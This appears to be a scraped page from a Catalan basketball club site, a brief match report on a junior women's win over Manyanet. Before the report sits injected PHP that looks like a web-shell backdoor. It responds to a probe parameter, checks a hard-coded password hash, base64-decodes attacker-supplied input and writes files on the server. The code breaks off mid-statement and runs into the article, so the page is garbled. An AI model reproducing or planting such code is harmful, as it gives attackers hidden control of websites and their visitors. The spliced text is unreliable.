function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení fa un parcial de 10-0 en els últims tres minuts i guanya el Manyanet (64-50) - Tgn Bàsquet Club -

El júnior femení fa un parcial de 10-0 en els últims tres minuts i guanya el Manyanet (64-50)

Updated: maig 2, 2017

El júnior femení va jugar el primer partit dels tres que ha disputat en una setmana contra el Manyanet. El conjunt que entrena Jordi Crespo es va endur la victòria després de fer un gran parcial de 10-0 en els últims tres minuts. El matx va estar molt igualat pel bon joc visitant, especialment per l’anotació de la jugadora del Manyanet Moles, que va anotar 16 punts en la primera meitat. Després d’un partit més ofensiu arran del descans, la rauxa lila final va possibilitar el triomf.